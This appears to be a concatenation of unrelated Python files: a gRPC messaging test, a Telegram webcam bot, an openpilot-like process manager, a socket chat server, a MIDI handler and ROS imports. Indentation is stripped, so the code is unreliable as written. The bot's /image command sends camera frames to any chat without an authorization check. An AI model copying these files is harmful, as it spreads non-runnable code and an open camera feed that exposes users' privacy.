sender_info = MachineInfo(ip=local_ip, port=sender_port,token='dummy1')
receiver_info = MachineInfo(ip=local_ip, port=receiver_port,token='dummy2')
msg_1 = HFL_MSG(
type=msg_type_str,
sender=sender_info,
receiver=receiver_info)
self.comm.send_message(msg_1)
return self.get_return()
local_ip = socket.gethostbyname(socket.gethostname())
sender_port = '9991'
receiver_port = '9909'
config_1 =Config(
ip=local_ip,
port=sender_port,
mode='proxy')
comm_1 = Communicator_Builder.make(
comm_type=CommType.GRPC_COMM,
config=config_1)
config_2 =Config(
ip=local_ip,
port=receiver_port,
mode='client')
comm_2 = Communicator_Builder.make(
comm_type= CommType.GRPC_COMM,
config = config_2)
sender = Sender(comm_1)
comm_1.add_msg_handler(sender)
receiver = Receiver(comm_2)
comm_2.add_msg_handler(receiver)
thread = threading.Thread(target=comm_2.run)
thread.start()
thread = threading.Thread(target=comm_1.run)
thread.start()
time.sleep(1)
send_msg_type_str = 'dummy'
ret_msg_type_str = sender.send(send_msg_type_str)
self.assertEqual(send_msg_type_str, ret_msg_type_str)
comm_1.stop()
comm_2.stop()
if __name__ == '__main__':
unittest.main()
|
bot2.py
|
#! /usr/bin/env python
# responde a comandos
import os
from telegram.ext import Updater, CommandHandler
import threading
from io import BytesIO
from PIL import Image
import cv2 as cv
from umucv.stream import Camera
from dotenv import load_dotenv
load_dotenv()
updater = Updater(os.environ['TOKEN'])
Bot = updater.bot
cam = Camera()
def shutdown():
updater.stop()
updater.is_idle = False
cam.stop()
def stop(update,_):
cid = update.message.chat_id
    if cid != int(os.environ['USER_ID']):  # chat_id is an int, the env var is a string
return
update.message.reply_text('Bye!')
threading.Thread(target=shutdown).start()
def hello(update, _):
update.message.reply_text('Hello {}'.format(update.message.from_user.first_name))
def sendImage(userid, frame):
frame = cv.cvtColor(frame, cv.COLOR_BGR2RGB)
image = Image.fromarray(frame, mode = 'RGB')
byte_io = BytesIO()
image.save(byte_io, 'PNG')
byte_io.seek(0)
Bot.sendPhoto(chat_id=userid, photo=byte_io)
def image(update,_):
cid = update.message.chat.id
img = cam.frame
sendImage(cid, img)
updater.dispatcher.add_handler(CommandHandler('stop', stop))
updater.dispatcher.add_handler(CommandHandler('hello', hello))
updater.dispatcher.add_handler(CommandHandler('image', image))
updater.start_polling()
updater.idle()
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
from common.op_params import opParams
op_params = opParams()
traffic_lights = op_params.get('traffic_lights', False)
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1140
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
  # whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
if __name__ == "__main__" and ANDROID:
from common.spinner import Spinner
from common.text_window import TextWindow
else:
from common.spinner import FakeSpinner as Spinner
from common.text_window import FakeTextWindow as TextWindow
if os.system("python3 -m pip list | grep 'scipy'") != 0:
os.system("cd /data/openpilot/installer/scipy_installer/ && ./scipy_installer")
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
process = subprocess.check_output(['git', 'pull'])
os.system('reboot')
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
process = subprocess.check_output(['git', 'pull'])
os.system('reboot')
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"trafficd": ("selfdrive/trafficd", ["./trafficd"]),
"traffic_manager": "selfdrive.trafficd.traffic_manager",
"thermalonlined": "selfdrive.thermalonlined",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"mapd": ("selfdrive/mapd", ["./mapd.py"]),
"driverview": "selfdrive.controls.lib.driverview",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
'deleter',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'mapd',
'thermalonlined',
'locationd',
'dmonitoringd',
]
if traffic_lights:
car_started_processes += [
'trafficd',
'traffic_manager',
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
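  # A daemon's pid is persisted in Params; if that pid is still alive and its
  # /proc cmdline contains the module name, the existing daemon is reused.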
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
if proc[0] != 'selfdrive/mapd':
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
#subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
#for p in daemon_processes:
# start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
logger_dead = True
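  # Main loop: every thermal message drives process management. Batch processes
  # (green_temp_processes) are paused above thermal status "yellow",
  # car_started_processes follow msg.thermal.started, and loggerd is kept dead
  # while free space is below 5%.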
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started and "driverview" not in running:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = True # set to False for logging
for p in reversed(car_started_processes):
kill_managed_process(p)
# this is ugly
if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1":
start_managed_process("driverview")
elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0":
kill_managed_process("driverview")
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "1"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "1"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "1"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
("DisablePowerDownTime", "30"),
("DistanceTraveled", "1"),
("DistanceTraveledEngaged", "1"),
("DistanceTraveledOverride", "1"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
process = subprocess.check_output(['git', 'pull'])
os.system('reboot')
raise
# manual exit because we are forked
sys.exit(0)
|
Server.py
|
import socket, threading
HOST = "127.0.0.1"
PORT = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))
server.listen()
clients = []
nicknames = []
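# clients and nicknames are parallel lists: the nickname at index i belongs to the
# client socket at index i. The handshake in receive() is: on connect the server
# sends "NICKNAME", the client answers with its nickname, and from then on every
# message received from that client is broadcast to all connected clients.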
# broadcast func
def broadcast(message):
for client in clients:
client.send(message)
# handle func
def handle(client):
while True:
try:
message = client.recv(2048)
print(f"{nicknames[clients.index(client)]} says {message}")
broadcast(message)
        except Exception:
            # client disconnected: remove it, close the socket and notify the others
            index = clients.index(client)
            clients.remove(client)
            client.close()
            nickname = nicknames[index]
            nicknames.remove(nickname)
            broadcast(f"{nickname} left the chat!\n".encode("utf-8"))
            break
# receive func
def receive():
while True:
client,address = server.accept()
print(f"Connected with {str(address)}!")
client.send("NICKNAME".encode("utf-8"))
nickname = client.recv(2048).decode("utf-8")
nicknames.append(nickname)
clients.append(client)
print(f"Nickname of new client is {nickname}")
broadcast(f"{nickname} joined the chat!\n".encode("utf-8"))
client.send("You Have Connected to the server".encode("utf-8"))
thread = threading.Thread(target=handle,args=(client,))
thread.start()
print("******Server is running******")
receive()
|
midi.py
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
"""
LJay/LJ
v0.7.0
Midi Handler
Deprecated, see midi3
by Sam Neurohack
from /team/laser
"""
print "importing midi 0"
import time
import rtmidi
from rtmidi.midiutil import open_midiinput
from threading import Thread
from rtmidi.midiconstants import (CHANNEL_PRESSURE, CONTROLLER_CHANGE, NOTE_ON, NOTE_OFF,
PITCH_BEND, POLY_PRESSURE, PROGRAM_CHANGE)
import mido
from mido import MidiFile
#import mido
import sys
from serial.tools import list_ports
import serial
from sys import platform
import gstt
# import bhoroscp
import bhoreal
import launchpad
from OSC import OSCServer, OSCClient, OSCMessage
#import orbits
midiname = ["Name"] * 16
midiport = [rtmidi.MidiOut() for i in range(16) ]
is_py2 = sys.version[0] == '2'
if is_py2:
from Queue import Queue
else:
from queue import Queue
# max 16 midi port array
midinputsname = ["Name"] * 16
midinputsqueue = [Queue() for i in range(16) ]
midinputs = []
BhorealMidiName = "Bhoreal"
LaunchMidiName = "Launch"
BhorealPort, Midi1Port, Midi2Port, VirtualPort, MPort = -1,-1,-1, -1, -1
VirtualName = "LaunchPad Mini"
Mser = False
# Mixolydian 3-note chord list
Myxo = [(59,51,54),(49,52,56),(49,52,56),(51,54,57),(52,56,59),(52,56,59),(54,57,48),(57,49,52)]
MidInsNumber = 0
try:
input = raw_input
except NameError:
# Python 3
StandardError = Exception
STATUS_MAP = {
'noteon': NOTE_ON,
'noteoff': NOTE_OFF,
'programchange': PROGRAM_CHANGE,
'controllerchange': CONTROLLER_CHANGE,
'pitchbend': PITCH_BEND,
'polypressure': POLY_PRESSURE,
'channelpressure': CHANNEL_PRESSURE
}
# OSC destination list for incoming midi
midi2OSC = {
"lj": {"oscip": "127.0.0.1", "oscport": 8002, "notes": False, "msgs": False},
"nozoid": {"oscip": "127.0.0.1", "oscport": 8003, "notes": False, "msgs": False},
"dump": {"oscip": "127.0.0.1", "oscport": 8040, "notes": True, "msgs": True}
}
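# Each midi2OSC entry names an OSC destination; "notes" / "msgs" select whether
# note events and other MIDI messages should be forwarded there (the actual
# OSCsend calls below are currently commented out).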
#mycontroller.midiport[LaunchHere].send_message([CONTROLLER_CHANGE, LaunchTop[number-1], color])
def send(device,msg):
'''
# if device is the midi name
if device in midiname:
deviceport = midiname.index(device)
midiport[deviceport].send_message(msg)
'''
if device == "Launchpad":
#print LaunchHere
midiport[gstt.LaunchHere].send_message(msg)
if device == "Bhoreal":
midiport[gstt.BhorealHere].send_message(msg)
def NoteOn(note, color):
global MidInsNumber
gstt.note = note
gstt.velocity = color
for port in range(MidInsNumber):
if midiname[port].find(LaunchMidiName) == 0:
launchpad.PadNoteOn(note%64,color)
if midiname[port].find(BhorealMidiName) == 0:
gstt.BhorLeds[note%64]=color
midiport[port].send_message([NOTE_ON, note%64, color])
#bhorosc.sendosc("/bhoreal", [note%64 , color])
if midiname[port].find(BhorealMidiName) != 0 and midiname[port].find(LaunchMidiName) != 0:
midiport[port].send_message([NOTE_ON, note, color])
#virtual.send_message([NOTE_ON, note, color])
for OSCtarget in midi2OSC:
if midi2OSC[OSCtarget]['notes']:
pass
#OSCsend(OSCtarget, "/noteon", [note, color])
def NoteOff(note):
global MidInsNumber
gstt.note = note
gstt.velocity = 0
for port in range(MidInsNumber):
if midiname[port].find(LaunchMidiName) == 0:
launchpad.PadNoteOff(note%64)
if midiname[port].find(BhorealMidiName) == 0:
midiport[port].send_message([NOTE_OFF, note%64, 0])
gstt.BhorLeds[note%64]=0
#bhorosc.sendosc("/bhoreal", [note%64 , 0])
if midiname[port].find(BhorealMidiName) != 0 and midiname[port].find(LaunchMidiName) != 0:
midiport[port].send_message([NOTE_OFF, note, 0])
#virtual.send_message([NOTE_OFF, note, 0])
for OSCtarget in midi2OSC:
if midi2OSC[OSCtarget]["notes"]:
pass
#OSCsend(OSCtarget, "/noteoff", note)
def MidiMsg(midimsg):
print ("MidiMsg", midimsg)
for port in range(MidInsNumber):
if midiname[port].find(BhorealMidiName) != 0:
midiport[port].send_message(midimsg)
def OSCsend(name, oscaddress, oscargs =''):
ip = midi2OSC[name]["oscip"]
port = midi2OSC[name]["oscport"]
osclient = OSCClient()
osclient.connect((ip, port))
oscmsg = OSCMessage()
oscmsg.setAddress(oscaddress)
oscmsg.append(oscargs)
try:
if gstt.debug > 0:
print("Midi OSCSend : sending", oscmsg, "to", name, "at", gstt.LjayServerIP, ":", PluginPort)
osclient.sendto(oscmsg, (ip, port))
oscmsg.clearData()
#if gstt.debug >0:
# print oscaddress, oscargs, "was sent to",name
return True
except:
if gstt.debug > 0:
print ('Midi OSCSend : Connection to IP', ip ,':', port,'refused : died ?')
#sendWSall("/status No plugin.")
#sendWSall("/status " + name + " is offline")
#sendWSall("/" + name + "/start 0")
#PluginStart(name)
return False
def WebStatus(message):
OSCsend("lj","/status", message)
#
# MIDI Startup and handling
#
mqueue = Queue()
inqueue = Queue()
#
# Events from Generic MIDI Handling
#
def midinProcess(midiqueue):
midiqueue_get = midiqueue.get
while True:
msg = midiqueue_get()
print ("midin ", msg)
time.sleep(0.001)
# Event from Bhoreal or Launchpad
def MidinProcess(inqueue):
inqueue_get = inqueue.get
while True:
time.sleep(0.001)
msg = inqueue_get()
print ("Midinproces", msg[0])
# Note On
if msg[0]==NOTE_ON:
NoteOn(msg[1],msg[2])
#if bhorosc.oscdevice == 1:
WebStatus(''.join(("note ",msg[1]," to ",msg[2])))
# Note Off
if msg[0]==NOTE_OFF:
print ("noteoff")
            NoteOff(msg[1])
            #if bhorosc.oscdevice == 1:
            WebStatus(''.join(("note ", str(msg[1]), " off")))
# Midi CC message
if msg[0] == CONTROLLER_CHANGE:
print ("CC :", msg[1], msg[2])
WebStatus("CC :" + str(msg[1]) + " " + str(msg[2]))
#orbits.RotX(msg[2])
for OSCtarget in midi2OSC:
if OSCtarget["notes"]:
pass
#OSCsend(OSCtarget, "/CC", note)
# other midi message
if msg[0] != NOTE_OFF and msg[0] != NOTE_ON:
            MidiMsg(msg)
            #if bhorosc.oscdevice == 1:
            WebStatus(''.join(("msg : ", str(msg[0]), " ", str(msg[1]), " ", str(msg[2]))))
# Generic call back : new msg forwarded to queue
class AddQueue(object):
def __init__(self, port):
self.port = port
print ("AddQueue", port)
self._wallclock = time.time()
def __call__(self, event, data=None):
message, deltatime = event
self._wallclock += deltatime
print("[%s] @%0.6f %r" % (self.port, self._wallclock, message))
inqueue.put(message)
#
# MIDI OUT Handling
#
def OutConfig():
global midiout, MidInsNumber
print("")
print("MIDIout...")
print("List and attach to available devices on host with IN port :")
# Display list of available midi IN devices on the host, create and start an OUT instance to talk to each of these Midi IN devices
midiout = rtmidi.MidiOut()
available_ports = midiout.get_ports()
for port, name in enumerate(available_ports):
midiname[port]=name
midiport[port].open_port(port)
print("Will send to [%i] %s" % (port, name))
#MidIns[port][1].open_port(port)
# Search for a Bhoreal
if name.find(BhorealMidiName) == 0:
print("Bhoreal start animation")
gstt.BhorealHere = port
bhoreal.StartBhoreal(port)
bhoreal.UpdateCurve()
bhoreal.UpdateSet()
bhoreal.UpdateLaser()
bhoreal.UpdateSimu()
time.sleep(0.2)
# Search for a LaunchPad
if name.find(LaunchMidiName) == 0:
print("Launchpad mini start animation")
gstt.LaunchHere = port
print(gstt.LaunchHere)
launchpad.StartLaunchPad(port)
time.sleep(0.2)
# Search for a Guitar Wing
if name.find("Livid") == 0:
print("Livid Guitar Wing start animation")
gstt.WingHere = port
print(gstt.WingHere)
#guitarwing.StartWing(port)
time.sleep(0.2)
print ("")
MidInsNumber = port+1
#
# MIDI IN Handling
# Create processing thread and queue for each device
#
def InConfig():
print("")
print("MIDIin...")
print("List and attach to available devices on host with OUT port :")
if platform == 'darwin':
mido.set_backend('mido.backends.rtmidi/MACOSX_CORE')
for port, name in enumerate(mido.get_input_names()):
#print (name)
midinputsname[port]=name
print(port,name)
# Bhoreal found ?
if name.find(BhorealMidiName) == 0:
# thread launch to handle all queued MIDI messages from Bhoreal device
thread = Thread(target=bhoreal.MidinProcess, args=(bhoreal.bhorqueue,))
thread.setDaemon(True)
thread.start()
try:
bhorealin, port_name = open_midiinput(port+1) # weird rtmidi call port number is not the same in mido enumeration and here
except (EOFError, KeyboardInterrupt):
sys.exit()
midinputs.append(bhorealin)
print("Attaching MIDI in callback handler to Bhoreal : ", name)
midinputs[port].set_callback(bhoreal.AddQueue(name))
print("Bhor",port,port_name)
# LaunchPad Mini Found ?
if name.find(LaunchMidiName) == 0:
# thread launch to handle all queued MIDI messages from LauchPad device
thread = Thread(target=launchpad.LaunchMidinProcess, args=(launchpad.launchqueue,))
thread.setDaemon(True)
thread.start()
try:
launchin, port_name = open_midiinput(port+1) # weird port number is not the same in mido enumeration and here
except (EOFError, KeyboardInterrupt):
sys.exit()
midinputs.append(launchin)
print ("Attaching MIDI in callback handler to Launchpad : ", name)
launchin.set_callback(launchpad.LaunchAddQueue(name))
#print "Launch",port,port_name
# all other devices
'''
port = mido.open_ioport(name,callback=AddQueue(name))
This doesn't work on OS X on French system "Réseau Session" has a bug with accent.
Todo : stop using different midi framework.
if name.find(BhorealMidiName) != 0 and name.find(LaunchMidiName) != 0:
thread = Thread(target=midinProcess, args=(midinputsqueue[port],))
thread.setDaemon(True)
thread.start()
try:
port = mido.open_ioport(name,callback=AddQueue(name))
#port_port, port_name = open_midiinput(port)
except (EOFError, KeyboardInterrupt):
sys.exit()
#midinputs.append(port_port)
print "Attaching MIDI in callback handler to : ", name
#midinputs[port].set_callback(AddQueue(name))
#MIDInport = mido.open_ioport("Laser",virtual=True,callback=MIDIn)
'''
if name.find(BhorealMidiName) != 0 and name.find(LaunchMidiName) != 0:
thread = Thread(target=midinProcess, args=(midinputsqueue[port],))
thread.setDaemon(True)
thread.start()
try:
port_port, port_name = open_midiinput(port)
except (EOFError, KeyboardInterrupt):
sys.exit()
midinputs.append(port_port)
print("Attaching MIDI in callback handler to : ", name)
midinputs[port].set_callback(AddQueue(name))
#MIDInport = mido.open_ioport("Laser",virtual=True,callback=MIDIn)
def End():
global midiout
#midiin.close_port()
midiout.close_port()
#del virtual
if gstt.LaunchHere != -1:
del gstt.LaunchHere
if gstt.BhorealHere != -1:
del gstt.BhorealHere
def listdevice(number):
return midiname[number]
def check():
InConfig()
OutConfig()
#return listdevice(255)
|
bulldog_vision_10.py
|
#!/usr/bin/env python3
#!coding=utf-8
import rospy
import numpy as np
import PIL.Image as pilimage
import actionlib
from sensor_msgs.msg import CompressedImage
from sensor_msgs.msg import Image
from std_msgs.msg import Float64
from cv_bridge import CvBridge, CvBridgeError
import cv2
import time
from yolo import YOLO
from tf_conversions import transformations
import tf
import os, sys
from sensor_msgs.msg import Joy
from std_msgs.msg import String
